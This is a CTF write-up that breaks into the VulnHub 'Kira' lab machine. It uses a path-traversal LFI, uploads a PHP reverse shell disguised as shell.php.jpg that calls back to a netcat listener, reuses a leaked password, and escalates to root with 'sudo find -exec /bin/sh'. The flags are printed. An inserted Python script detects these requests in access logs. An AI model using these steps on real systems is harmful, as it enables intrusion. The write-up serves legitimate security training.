[VULNHUB] KiraCTF

Today we are going to hack the VulnHub machine called Kira. You can download it from the following link: https://www.vulnhub.com/entry/kira-ctf,594/
  • Enumeration
  • We start with an nmap scan to see which ports are open.
    > nmap -A -p- 192.168.1.24
    Starting Nmap 7.70 ( https://nmap.org ) at 2020-11-13 13:09 CET
    Nmap scan report for bassam-aziz.home (192.168.1.24)
    Host is up (0.0025s latency).
    Not shown: 65534 closed ports
    PORT   STATE SERVICE VERSION
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: Site doesn't have a title (text/html).
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 16.91 seconds
    We see that only port 80 is open, so we look at it in more detail with the help of gobuster.
    > gobuster dir -u http://192.168.1.24/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://192.168.1.24/
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Timeout:        10s
    ===============================================================
    2020/11/13 13:28:41 Starting gobuster
    ===============================================================
    /uploads (Status: 301)
    /server-status (Status: 403)
    ===============================================================
    2020/11/13 13:31:26 Finished
    ===============================================================
    We find the "uploads" directory. If we browse to http://192.168.1.24/uploads, we can see there are 2 buttons. The first button lets us upload an image, and the second takes us to a page titled LFI, which we can exploit through the "lang" parameter:
    http://192.168.1.24/language.php?lang=../../../etc/passwd.
    Seeing this, what we will do is upload a PHP reverse shell and execute it through the LFI. We prepare our reverse shell.
    cp /usr/share/webshells/php/php-reverse-shell.php shell.php.jpg
    We edit it to set our IP and port...
    nano shell.php.jpg
    Note that to bypass the image check, in this case it is as simple as renaming our shell.php to shell.php.jpg. Once the previous steps are done, we upload the file shell.php.jpg. We start nc listening.
    > nc -nlvp 1234
    And we visit:
    http://192.168.1.24/language.php?lang=../../../var/www/html/uploads/shell.php.jpg
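    As an added example, not part of the original write-up or the machine's own code: a small Python detector that flags, in Apache access-log lines, the two web requests used above (traversal in the `lang` parameter of language.php, and a double-extension file such as shell.php.jpg referenced under /uploads or through that parameter). The log lines, client IPs and file names are constructed for the example.

```python
# Added example (not from the write-up): flag Apache access-log lines that show
# traversal in language.php's `lang` parameter or a double-extension file such
# as shell.php.jpg under /uploads. Paths and log lines are constructed here.
import re
from urllib.parse import parse_qs, unquote, urlsplit

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})')
TRAVERSAL = re.compile(r'\.\./|\.\.\\|%2e%2e', re.IGNORECASE)
# a PHP-family extension followed by one more extension, e.g. shell.php.jpg
DOUBLE_EXT = re.compile(r'\.(php\d?|phtml|phar)\.\w+$', re.IGNORECASE)

def check_request(request_path):
    """Return the finding tags for one request path (query string included)."""
    tags = []
    parts = urlsplit(request_path)
    # parse_qs percent-decodes once; unquote again catches double encoding
    for value in parse_qs(parts.query, keep_blank_values=True).get("lang", []):
        decoded = unquote(value)
        if TRAVERSAL.search(decoded):
            tags.append("lfi_traversal")
        if DOUBLE_EXT.search(decoded):
            tags.append("include_of_uploaded_script")
    if parts.path.startswith("/uploads/") and DOUBLE_EXT.search(parts.path):
        tags.append("double_extension_under_uploads")
    return tags

def scan_log(lines):
    """Return (client_ip, request_path, tags) for every suspicious log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            tags = check_request(m.group("path"))
            if tags:
                hits.append((m.group("ip"), m.group("path"), tags))
    return hits

# Constructed sample lines: a benign request, the /etc/passwd probe, a
# double-percent-encoded variant, the include of the upload and a plain fetch of it.
SAMPLE_LOG = [
    '192.168.1.102 - - [13/Nov/2020:13:45:01 +0100] "GET /language.php?lang=en HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.1.102 - - [13/Nov/2020:13:46:10 +0100] "GET /language.php?lang=../../../etc/passwd HTTP/1.1" 200 2140 "-" "Mozilla/5.0"',
    '192.168.1.102 - - [13/Nov/2020:13:47:33 +0100] "GET /language.php?lang=..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 2140 "-" "Mozilla/5.0"',
    '192.168.1.102 - - [13/Nov/2020:13:51:05 +0100] "GET /language.php?lang=../../../var/www/html/uploads/shell.php.jpg HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [13/Nov/2020:13:51:40 +0100] "GET /uploads/shell.php.jpg HTTP/1.1" 200 5493 "-" "Mozilla/5.0"',
]

for ip, path, tags in scan_log(SAMPLE_LOG):
    print(ip, path, ", ".join(tags))
```

    Running it prints the four suspicious lines; the benign `lang=en` request produces no finding.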
  • Low Shell
  • We get our shell :D
    > nc -nlvp 1234
    listening on [any] 1234 ...
    connect to [192.168.1.102] from (UNKNOWN) [192.168.1.24] 42010
    Linux bassam-aziz 5.3.0-28-generic #30~18.04.1-Ubuntu SMP Fri Jan 17 06:14:09 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
     13:04:21 up 34 min,  1 user,  load average: 1.02, 1.02, 0.98
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    bassam   :0       :0               12:30   ?xdm?  33:07   0.00s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu gnome-session --session=ubuntu
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $
    We explore the system to see if we can find anything.
    $ python3 -c 'import pty;pty.spawn("/bin/bash")'
    www-data@bassam-aziz:/var/www/html$ ls -la
    total 28
    drwxr-xr-x 4 root root 4096 مار 26  2020 .
    drwxr-xr-x 3 root root 4096 مار 26  2020 ..
    -rw-r--r-- 1 root root  163 مار 26  2020 index.html
    -rw-r--r-- 1 root root  287 مار 26  2020 language.php
    drwxr-xr-x 2 root root 4096 نوف  4 10:52 supersecret-for-aziz
    -rw-r--r-- 1 root root  747 مار 26  2020 upload.php
    drwxrwxrwx 2 root root 4096 نوف 14 12:43 uploads
    www-data@bassam-aziz:/var/www/html$ cd supersecret-for-aziz
    www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ ls -la
    ls -la
    total 12
    drwxr-xr-x 2 root root 4096 نوف  4 10:52 .
    drwxr-xr-x 4 root root 4096 مار 26  2020 ..
    -rw-r--r-- 1 root root   15 نوف  4 10:52 bassam-pass.txt
    www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ cat bassam-pass.txt
    Password123!@#
    It looks like we have found the password of the user bassam, so we log in!
    www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ su bassam
    su bassam
    Password: Password123!@#
  • user.txt
  • bassam@bassam-aziz:~$ cat user.txt
    THM{Bassam-Is-Better_Than-KIRA}
  • Privilege Escalation
  • We check whether we can do anything with sudo.
    bassam@bassam-aziz:~$ sudo -l
    [sudo] password for bassam: Password123!@#
    Matching Defaults entries for bassam on bassam-aziz:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User bassam may run the following commands on bassam-aziz:
        (ALL : ALL) /usr/bin/find
    We see that we can run find with sudo, so we use it to get our privileged shell!
    bassam@bassam-aziz:~$ sudo find . -exec /bin/sh \; -quit
    # cd /root
    # ls
    flag.txt
    # cat flag.txt
    THM{root-Is_Better-Than_All-of-THEM-31337}
  • End
  • And with this we are root on the machine.